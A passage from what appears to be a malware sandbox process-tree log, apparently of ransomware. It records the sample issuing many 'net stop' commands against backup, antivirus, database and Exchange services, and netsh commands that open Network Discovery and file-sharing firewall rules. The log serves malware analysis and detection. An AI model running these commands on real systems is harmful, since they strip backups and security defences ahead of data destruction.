    3⤵
    PID:5964
- - C:\Windows\system32\net.exe
    "net.exe" stop VeeamDeploySvc /y
    3⤵
    PID:5776
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop VeeamDeploySvc /y
      4⤵
      PID:6040
- - C:\Windows\system32\net.exe
    "net.exe" stop MsDtsServer100 /y
    3⤵
    PID:276
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop MsDtsServer100 /y
      4⤵
      PID:5004
- - C:\Windows\system32\net.exe
    "net.exe" stop VeeamMountSvc /y
    3⤵
    PID:5100
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop VeeamMountSvc /y
      4⤵
      PID:4368
- - C:\Windows\system32\net.exe
    "net.exe" stop BackupExecJobEngine /y
    3⤵
    PID:4696
- - C:\Windows\system32\net.exe
    "net.exe" stop BackupExecManagementService /y
    3⤵
    PID:5428
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop BackupExecManagementService /y
      4⤵
      PID:4808
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop SntpService /y
      4⤵
      PID:4432
- - C:\Windows\system32\net.exe
    "net.exe" stop NetMsmqActivator /y
    3⤵
    PID:4768
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop NetMsmqActivator /y
      4⤵
      PID:4812
- - C:\Windows\system32\net.exe
    "net.exe" stop MSSQLServerOLAPService /y
    3⤵
    PID:4612
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop MSSQLServerOLAPService /y
      4⤵
      PID:5372
- - C:\Windows\system32\net.exe
    "net.exe" stop BackupExecRPCService /y
    3⤵
    PID:4204
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop BackupExecRPCService /y
      4⤵
      PID:5364
- - C:\Windows\system32\net.exe
    "net.exe" stop MSSQLSERVER /y
    3⤵
    PID:2240
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop MSSQLSERVER /y
      4⤵
      PID:1200
- - C:\Windows\system32\net.exe
    "net.exe" stop MSExchangeIS /y
    3⤵
    PID:1944
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop MSExchangeIS /y
      4⤵
      PID:4184
- - C:\Windows\system32\net.exe
    "net.exe" stop MBEndpointAgent /y
    3⤵
    PID:4936
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop MBEndpointAgent /y
      4⤵
      PID:1440
- - C:\Windows\system32\net.exe
    "net.exe" stop McAfeeFrameworkMcAfeeFramework /y
    3⤵
    PID:5984
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop McAfeeFrameworkMcAfeeFramework /y
      4⤵
      PID:3912
- - C:\Windows\system32\net.exe
    "net.exe" stop AcrSch2Svc /y
    3⤵
    PID:1308
- - C:\Windows\system32\net.exe
    "net.exe" stop “Sophos AutoUpdate Service” /y
    3⤵
    PID:1412
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop “Sophos AutoUpdate Service” /y
      4⤵
      PID:5124
- - C:\Windows\system32\net.exe
    "net.exe" stop AcronisAgent /y
    3⤵
    PID:5236
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop AcronisAgent /y
      4⤵
      PID:4100
- - C:\Windows\system32\net.exe
    "net.exe" stop VeeamEnterpriseManagerSvc /y
    3⤵
    PID:1532
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop VeeamEnterpriseManagerSvc /y
      4⤵
      PID:5208
- - C:\Windows\system32\net.exe
    "net.exe" stop SamSs /y
    3⤵
    PID:184
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop SamSs /y
      4⤵
      PID:4828
- - C:\Windows\system32\net.exe
    "net.exe" stop VeeamNFSSvc /y
    3⤵
    PID:4580
- - C:\Windows\system32\net.exe
    "net.exe" stop ReportServer /y
    3⤵
    PID:1424
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop ReportServer /y
      4⤵
      PID:4232
- - C:\Windows\system32\net.exe
    "net.exe" stop CASAD2DWebSvc /y
    3⤵
    PID:5288
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop CASAD2DWebSvc /y
      4⤵
      PID:1608
- - C:\Windows\system32\net.exe
    "net.exe" stop MySQL57 /y
    3⤵
    PID:4400
- - C:\Windows\system32\net.exe
    "net.exe" stop mfefire /y
    3⤵
    PID:4752
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop mfefire /y
      4⤵
      PID:4724
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop SQLAgent$SQL_2008 /y
      4⤵
      PID:5280
- - C:\Windows\system32\net.exe
    "net.exe" stop McShield /y
    3⤵
    PID:4224
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop McShield /y
      4⤵
      PID:5936
- - C:\Windows\system32\net.exe
    "net.exe" stop “SQLsafe Backup Service” /y
    3⤵
    PID:4228
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop “SQLsafe Backup Service” /y
      4⤵
      PID:2544
- - C:\Windows\system32\net.exe
    "net.exe" stop CAARCUpdateSvc /y
    3⤵
    PID:5948
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop CAARCUpdateSvc /y
      4⤵
      PID:4464
- - C:\Windows\system32\net.exe
    "net.exe" stop VeeamRESTSvc /y
    3⤵
    PID:4144
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop VeeamRESTSvc /y
      4⤵
      PID:4556
- - C:\Windows\system32\net.exe
    "net.exe" stop wbengine /y
    3⤵
    PID:4788
- - C:\Windows\system32\net.exe
    "net.exe" stop ReportServer$SQL_2008 /y
    3⤵
    PID:4560
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop ReportServer$SQL_2008 /y
      4⤵
      PID:5140
- - C:\Windows\system32\net.exe
    "net.exe" stop MsDtsServer110 /y
    3⤵
    PID:4360
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop MsDtsServer110 /y
      4⤵
      PID:5652
- - C:\Windows\system32\net.exe
    "net.exe" stop sophos /y
    3⤵
    PID:4500
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop sophos /y
      4⤵
      PID:4496
- - C:\Windows\system32\net.exe
    "net.exe" stop mfemms /y
    3⤵
    PID:4772
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop mfemms /y
      4⤵
      PID:2392
- - C:\Windows\system32\net.exe
    "net.exe" stop “Acronis VSS Provider” /y
    3⤵
    PID:5612
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop “Acronis VSS Provider” /y
      4⤵
      PID:5840
- - C:\Windows\system32\net.exe
    "net.exe" stop POP3Svc /y
    3⤵
    PID:6088
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop POP3Svc /y
      4⤵
      PID:5764
- - C:\Windows\system32\net.exe
    "net.exe" stop McTaskManager /y
    3⤵
    PID:5456
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop McTaskManager /y
      4⤵
      PID:2200
- - C:\Windows\system32\net.exe
    "net.exe" stop RESvc /y
    3⤵
    PID:5272
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop RESvc /y
      4⤵
      PID:5888
- - C:\Windows\system32\net.exe
    "net.exe" stop MSExchangeMGMT /y
    3⤵
    PID:5784
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:4664
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop MSExchangeMGMT /y
      4⤵
      PID:5004
- - C:\Windows\system32\net.exe
    "net.exe" stop IISAdmin /y
    3⤵
    PID:6036
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop IISAdmin /y
      4⤵
      PID:4128
- - C:\Windows\system32\net.exe
    "net.exe" stop “Sophos Clean Service” /y
    3⤵
    PID:3672
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop “Sophos Clean Service” /y
      4⤵
      PID:4844
- - C:\Windows\system32\net.exe
    "net.exe" stop MSExchangeES /y
    3⤵
    PID:5364
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop MSExchangeES /y
      4⤵
      PID:4216
- - C:\Windows\system32\net.exe
    "net.exe" stop OracleClientCache80 /y
    3⤵
    PID:5924
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop OracleClientCache80 /y
      4⤵
      PID:5968
- - C:\Windows\system32\net.exe
    "net.exe" stop sms_site_sql_backup /y
    3⤵
    PID:5012
- - C:\Windows\system32\net.exe
    "net.exe" stop SQLAgent$BKUPEXEC /y
    3⤵
    PID:1224
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop SQLAgent$BKUPEXEC /y
      4⤵
      PID:1092
- - C:\Windows\system32\net.exe
    "net.exe" stop SMTPSvc /y
    3⤵
    PID:2568
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop SMTPSvc /y
      4⤵
      PID:4312
- - C:\Windows\system32\net.exe
    "net.exe" stop SQLAgent$PRACTTICEBGC /y
    3⤵
    PID:5980
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop SQLAgent$PRACTTICEBGC /y
      4⤵
      PID:5760
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop VeeamBackupSvc /y
        5⤵
        
        PID:2568
- - C:\Windows\system32\net.exe
    "net.exe" stop ReportServer$SQL_2008 /y
    3⤵
    PID:5524
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop ReportServer$SQL_2008 /y
      4⤵
      PID:4828
- - C:\Windows\system32\net.exe
    "net.exe" stop EraserSvc11710 /y
    3⤵
    PID:5252
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop EraserSvc11710 /y
      4⤵
      PID:4204
- - C:\Windows\system32\net.exe
    "net.exe" stop MSSQL$SOPHOS /y
    3⤵
    PID:5376
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop MSSQL$SOPHOS /y
      4⤵
      PID:5736
- - C:\Windows\system32\net.exe
    "net.exe" stop SepMasterService /y
    3⤵
    PID:1944
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop SepMasterService /y
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:1724
- - C:\Windows\system32\net.exe
    "net.exe" stop “Sophos Agent” /y
    3⤵
    PID:2184
- - C:\Windows\system32\net.exe
    "net.exe" stop msftesql$PROD /y
    3⤵
    PID:2152
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop msftesql$PROD /y
      4⤵
      PID:5192
- - C:\Windows\system32\net.exe
    "net.exe" stop “SQLsafe Filter Service” /y
    3⤵
    PID:4768
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop “SQLsafe Filter Service” /y
      4⤵
      PID:5312
- - C:\Windows\system32\net.exe
    "net.exe" stop ReportServer$TPSAMA /y
    3⤵
    PID:4476
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop ReportServer$TPSAMA /y
      4⤵
      PID:4264
- - C:\Windows\system32\net.exe
    "net.exe" stop SQLAgent$PRACTTICEMGT /y
    3⤵
    PID:5500
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop SQLAgent$PRACTTICEMGT /y
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:3984
- - C:\Windows\system32\net.exe
    "net.exe" stop SQLAgent$CITRIX_METAFRAME /y
    3⤵
    PID:1364
- - C:\Windows\system32\net.exe
    "net.exe" stop SstpSvc /y
    3⤵
    PID:4156
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop SstpSvc /y
      4⤵
      PID:4388
- - C:\Windows\system32\net.exe
    "net.exe" stop sacsvr /y
    3⤵
    PID:2516
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop sacsvr /y
      4⤵
      PID:1532
- - C:\Windows\system32\net.exe
    "net.exe" stop MSExchangeMTA /y
    3⤵
    PID:5328
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop MSExchangeMTA /y
      4⤵
      PID:5032
- - C:\Windows\system32\net.exe
    "net.exe" stop “Zoolz 2 Service” /y
    3⤵
    PID:5484
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop “Zoolz 2 Service” /y
      4⤵
      PID:4536
- - C:\Windows\system32\net.exe
    "net.exe" stop ShMonitor /y
    3⤵
    PID:4300
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop ShMonitor /y
      4⤵
      PID:4788
- - C:\Windows\system32\net.exe
    "net.exe" stop MSOLAP$TPS /y
    3⤵
    PID:4628
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop MSOLAP$TPS /y
      4⤵
      PID:4836
- - C:\Windows\system32\net.exe
    "net.exe" stop SQLAgent$CXDB /y
    3⤵
    PID:4336
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop SQLAgent$CXDB /y
      4⤵
      PID:4968
- - C:\Windows\system32\net.exe
    "net.exe" stop “Sophos Device Control Service” /y
    3⤵
    PID:4408
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop “Sophos Device Control Service” /y
      4⤵
      PID:4832
- - C:\Windows\system32\net.exe
    "net.exe" stop SQLAgent$PROD /y
    3⤵
    PID:5388
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop SQLAgent$PROD /y
      4⤵
      PID:5024
- - C:\Windows\system32\netsh.exe
    "netsh" advfirewall firewall set rule group=\"Network Discovery\" new enable=Yes
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4540
- - C:\Windows\system32\net.exe
    "net.exe" stop mfevtp /y
    3⤵
    PID:5804
- - C:\Windows\system32\net.exe
    "net.exe" stop ReportServer$SYSTEM_BGC /y
    3⤵
    PID:4904
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop ReportServer$SYSTEM_BGC /y
      4⤵
      PID:4964
- - C:\Windows\system32\net.exe
    "net.exe" stop “aphidmonitorservice” /y
    3⤵
    PID:5448
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop “aphidmonitorservice” /y
      4⤵
      PID:5516
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:4928
- - C:\Windows\system32\net.exe
    "net.exe" stop SAVAdminService /y
    3⤵
    PID:5864
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop SAVAdminService /y
      4⤵
      PID:4940
- - C:\Windows\system32\net.exe
    "net.exe" stop Smcinst /y
    3⤵
    PID:4700
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop Smcinst /y
      4⤵
      PID:4856
- - C:\Windows\system32\net.exe
    "net.exe" stop VeeamTransportSvc /y
    3⤵
    PID:5360
- - C:\Windows\system32\net.exe
    "net.exe" stop “Symantec System Recovery” /y
    3⤵
    PID:5888
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop “Symantec System Recovery” /y
      4⤵
      PID:5132
- - C:\Windows\system32\net.exe
    "net.exe" stop msexchangeadtopology /y
    3⤵
    PID:5284
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop msexchangeadtopology /y
      4⤵
      PID:2856
- - C:\Windows\system32\net.exe
    "net.exe" stop SQLAgent$ECWDB2 /y
    3⤵
    PID:5352
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop SQLAgent$ECWDB2 /y
      4⤵
      PID:2196
- - C:\Windows\system32\net.exe
    "net.exe" stop MSOLAP$SQL_2008 /y
    3⤵
    PID:4160
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop MSOLAP$SQL_2008 /y
      4⤵
      PID:2160
- - C:\Windows\system32\net.exe
    "net.exe" stop SQLAgent$PROFXENGAGEMENT /y
    3⤵
    PID:5940
- - C:\Windows\system32\net.exe
    "net.exe" stop SAVService /y
    3⤵
    PID:5304
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop SAVService /y
      4⤵
      PID:8
- - C:\Windows\system32\net.exe
    "net.exe" stop “Sophos MCS Agent” /y
    3⤵
    PID:6008
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop “Sophos MCS Agent” /y
      4⤵
      PID:6136
- - C:\Windows\system32\net.exe
    "net.exe" stop UI0Detect /y
    3⤵
    PID:5512
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop UI0Detect /y
      4⤵
      PID:4216
- - C:\Windows\system32\net.exe
    "net.exe" stop SmcService /y
    3⤵
    PID:5008
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop SmcService /y
      4⤵
      PID:4776
- - C:\Windows\system32\net.exe
    "net.exe" stop MSExchangeSA /y
    3⤵
    PID:4760
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop MSExchangeSA /y
      4⤵
      PID:5960
- - C:\Windows\system32\net.exe
    "net.exe" stop AcrSch2Svc /y
    3⤵
    PID:1088
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop AcrSch2Svc /y
      4⤵
      PID:5128
- - C:\Windows\system32\net.exe
    "net.exe" stop SQLAgent$SYSTEM_BGC /y
    3⤵
    PID:4996
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop SQLAgent$SYSTEM_BGC /y
      4⤵
      PID:4528
- - C:\Windows\system32\net.exe
    "net.exe" stop SQLAgent$SBSMONITORING /y
    3⤵
    PID:268
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop SQLAgent$SBSMONITORING /y
      4⤵
      PID:5212
- - C:\Windows\system32\net.exe
    "net.exe" stop MSOLAP$TPSAMA /y
    3⤵
    PID:2604
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop MSOLAP$TPSAMA /y
      4⤵
      PID:3552
- - C:\Windows\system32\net.exe
    "net.exe" stop ReportServer$TPS /y
    3⤵
    PID:5828
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop ReportServer$TPS /y
      4⤵
      PID:4692
- - C:\Windows\system32\net.exe
    "net.exe" stop swi_filter /y
    3⤵
    PID:5984
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop swi_filter /y
      4⤵
      PID:4784
- - C:\Windows\system32\net.exe
    "net.exe" stop “intel(r) proset monitoring service” /y
    3⤵
    PID:2512
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop “intel(r) proset monitoring service” /y
      4⤵
      PID:4648
- - C:\Windows\system32\net.exe
    "net.exe" stop SntpService /y
    3⤵
    PID:5428
- - C:\Windows\system32\net.exe
    "net.exe" stop msexchangeimap4 /y
    3⤵
    PID:6120
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop msexchangeimap4 /y
      4⤵
      PID:2804
- - C:\Windows\system32\net.exe
    "net.exe" stop SQLAgent$SHAREPOINT /y
    3⤵
    PID:4396
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop SQLAgent$SHAREPOINT /y
      4⤵
      PID:5748
- - C:\Windows\system32\net.exe
    "net.exe" stop SQLAgent$TPS /y
    3⤵
    PID:5296
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop SQLAgent$TPS /y
      4⤵
      PID:4504
- - C:\Windows\system32\net.exe
    "net.exe" stop “Veeam Backup Catalog Data Service” /y
    3⤵
    PID:4232
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop “Veeam Backup Catalog Data Service” /y
      4⤵
      PID:4688
- - C:\Windows\system32\net.exe
    "net.exe" stop “Sophos MCS Client” /y
    3⤵
    PID:1264
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop “Sophos MCS Client” /y
      4⤵
      PID:4972
- - C:\Windows\system32\net.exe
    "net.exe" stop sophossps /y
    3⤵
    PID:2568
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop sophossps /y
      4⤵
      PID:204
- - C:\Windows\system32\net.exe
    "net.exe" stop W3Svc /y
    3⤵
    PID:4156
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop W3Svc /y
      4⤵
      PID:4532
- - C:\Windows\system32\net.exe
    "net.exe" stop ARSM /y
    3⤵
    PID:5360
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop ARSM /y
      4⤵
      PID:1424
- - C:\Windows\system32\net.exe
    "net.exe" stop swi_service /y
    3⤵
    PID:5612
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop swi_service /y
      4⤵
      PID:5032
- - C:\Windows\system32\net.exe
    "net.exe" stop SQLAgent$TPSAMA /y
    3⤵
    PID:5620
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop SQLAgent$TPSAMA /y
      4⤵
      PID:4644
- - C:\Windows\system32\net.exe
    "net.exe" stop MSSQL$BKUPEXEC /y
    3⤵
    PID:5392
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop MSSQL$BKUPEXEC /y
      4⤵
      PID:4732
- - C:\Windows\system32\net.exe
    "net.exe" stop MSExchangeSRS /y
    3⤵
    PID:5964
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop MSExchangeSRS /y
      4⤵
      PID:4404
- - C:\Windows\system32\net.exe
    "net.exe" stop unistoresvc_1af40a /y
    3⤵
    PID:5416
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop unistoresvc_1af40a /y
      4⤵
      PID:5956
- - C:\Windows\system32\net.exe
    "net.exe" stop swi_update /y
    3⤵
    PID:3988
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop swi_update /y
      4⤵
      PID:4564
- - C:\Windows\system32\net.exe
    "net.exe" stop “Sophos Health Service” /y
    3⤵
    PID:4544
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop “Sophos Health Service” /y
      4⤵
      PID:264
- - C:\Windows\system32\net.exe
    "net.exe" stop SQLAgent$SOPHOS /y
    3⤵
    PID:5424
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop SQLAgent$SOPHOS /y
      4⤵
      PID:4608
- - C:\Windows\system32\net.exe
    "net.exe" stop MSSQL$ECWDB2 /y
    3⤵
    PID:5136
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop MSSQL$ECWDB2 /y
      4⤵
      PID:4668
- - C:\Windows\system32\net.exe
    "net.exe" stop SQLAgent$VEEAMSQL2008R2 /y
    3⤵
    PID:4856
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop SQLAgent$VEEAMSQL2008R2 /y
      4⤵
      PID:5048
- - C:\Windows\system32\net.exe
    "net.exe" stop “Sophos Message Router” /y
    3⤵
    PID:5368
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop “Sophos Message Router” /y
      4⤵
      PID:5496
- - C:\Windows\system32\net.exe
    "net.exe" stop SQLAgent$SQLEXPRESS /y
    3⤵
    PID:5816
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop SQLAgent$SQLEXPRESS /y
      4⤵
      PID:5148
- - C:\Windows\system32\net.exe
    "net.exe" stop BackupExecAgentAccelerator /y
    3⤵
    PID:2192
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop BackupExecAgentAccelerator /y
      4⤵
      PID:4372
- - C:\Windows\system32\net.exe
    "net.exe" stop swi_update_64 /y
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4632
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop swi_update_64 /y
      4⤵
      PID:212
- - C:\Windows\system32\net.exe
    "net.exe" stop audioendpointbuilder /y
    3⤵
    PID:6028
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop audioendpointbuilder /y
      4⤵
      PID:5708
- - C:\Windows\system32\net.exe
    "net.exe" stop SQLAgent$SQL_2008 /y
    3⤵
    PID:4752
- - C:\Windows\system32\netsh.exe
    "netsh" advfirewall firewall set rule group=\"Network Discovery\" new enable=Yes
    3⤵
    PID:6124
- - C:\Windows\system32\net.exe
    "net.exe" stop SQLAgent$VEEAMSQL2012 /y
    3⤵
    PID:5056
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop SQLAgent$VEEAMSQL2012 /y
      4⤵
      PID:2772
- - C:\Windows\system32\net.exe
    "net.exe" stop MSSQL$SBSMONITORING /
    3⤵
    PID:8
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop MSSQL$SBSMONITORING /
      4⤵
      PID:3636
- - C:\Windows\system32\net.exe
    "net.exe" stop svcGenericHost /y
    3⤵
    PID:3108
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop svcGenericHost /y
      4⤵
      PID:5596
- - C:\Windows\system32\net.exe
    "net.exe" stop MSSQL$SBSMONITORING /y
    3⤵
    PID:5536
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop MSSQL$SBSMONITORING /y
      4⤵
      PID:2508
- - C:\Windows\system32\net.exe
    "net.exe" stop MSOLAP$SYSTEM_BGC /y
    3⤵
    PID:2120
- - C:\Windows\system32\net.exe
    "net.exe" stop SQLTELEMETRY /y
    3⤵
    PID:5144
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop SQLTELEMETRY /y
      4⤵
      PID:504
- - C:\Windows\system32\net.exe
    "net.exe" stop AVP /y
    3⤵
    PID:5168
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop AVP /y
      4⤵
      PID:5248
- - C:\Windows\system32\net.exe
    "net.exe" stop SQLBrowser /y
    3⤵
    PID:5192
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop SQLBrowser /y
      4⤵
      PID:5068
- - C:\Windows\system32\net.exe
    "net.exe" stop TrueKeyServiceHelper /y
    3⤵
    PID:5520
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop TrueKeyServiceHelper /y
      4⤵
      PID:5184
- - C:\Windows\system32\net.exe
    "net.exe" stop BackupExecVSSProvider /y
    3⤵
    PID:4696
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop BackupExecVSSProvider /y
      4⤵
      PID:1388
- - C:\Windows\system32\net.exe
    "net.exe" stop tmlisten /y
    3⤵
    PID:5860
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop tmlisten /y
      4⤵
      PID:5264
- - C:\Windows\system32\net.exe
    "net.exe" stop SQLTELEMETRY$ECWDB2 /y
    3⤵
    PID:4248
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop SQLTELEMETRY$ECWDB2 /y
      4⤵
      PID:5880
- - C:\Windows\system32\net.exe
    "net.exe" stop TmCCSF /y
    3⤵
    PID:1416
- - C:\Windows\system32\net.exe
    "net.exe" stop MSSQL$SHAREPOINT /y
    3⤵
    PID:4388
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop MSSQL$SHAREPOINT /y
      4⤵
      PID:5564
- - C:\Windows\system32\net.exe
    "net.exe" stop SQLSafeOLRService /y
    3⤵
    PID:3236
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop SQLSafeOLRService /y
      4⤵
      PID:4728
- - C:\Windows\system32\net.exe
    "net.exe" stop “Sophos File Scanner Service” /y
    3⤵
    PID:4508
- - C:\Windows\system32\net.exe
    "net.exe" stop DCAgent /y
    3⤵
    PID:5796
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop DCAgent /y
      4⤵
      PID:4756
- - C:\Windows\system32\net.exe
    "net.exe" stop WRSVC /y
    3⤵
    PID:4908
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop WRSVC /y
      4⤵
      PID:3148
- - C:\Windows\system32\net.exe
    "net.exe" stop mssql$vim_sqlexp /y
    3⤵
    PID:5484
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop mssql$vim_sqlexp /y
      4⤵
      PID:868
- - C:\Windows\system32\net.exe
    "net.exe" stop TrueKey /y
    3⤵
    PID:5364
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop TrueKey /y
      4⤵
      PID:5500
- - C:\Windows\system32\net.exe
    "net.exe" stop MsDtsServer /y
    3⤵
    PID:4796
- - C:\Windows\system32\net.exe
    "net.exe" stop wbengine /y
    3⤵
    PID:4820
- - C:\Windows\system32\net.exe
    "net.exe" stop MySQL80 /y
    3⤵
    PID:6020
- - C:\Windows\system32\net.exe
    "net.exe" stop vapiendpoint /y
    3⤵
    PID:5700
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop vapiendpoint /y
      4⤵
      PID:4220
- - C:\Windows\system32\net.exe
    "net.exe" stop SQLSERVERAGENT /y
    3⤵
    PID:4456
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop SQLSERVERAGENT /y
      4⤵
      PID:5976
- - C:\Windows\system32\net.exe
    "net.exe" stop VeeamTransportSvc /y
    3⤵
    PID:1532
- - C:\Windows\system32\net.exe
    "net.exe" stop MSSQLFDLauncher$SBSMONITORING /y
    3⤵
    PID:2152
- - C:\Windows\system32\net.exe
    "net.exe" stop TrueKeyScheduler /y
    3⤵
    PID:4404
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop TrueKeyScheduler /y
      4⤵
      PID:4836
- - C:\Windows\system32\netsh.exe
    "netsh" advfirewall firewall set rule group=\"File and Printer Sharing\" new enable=Yes
    3⤵
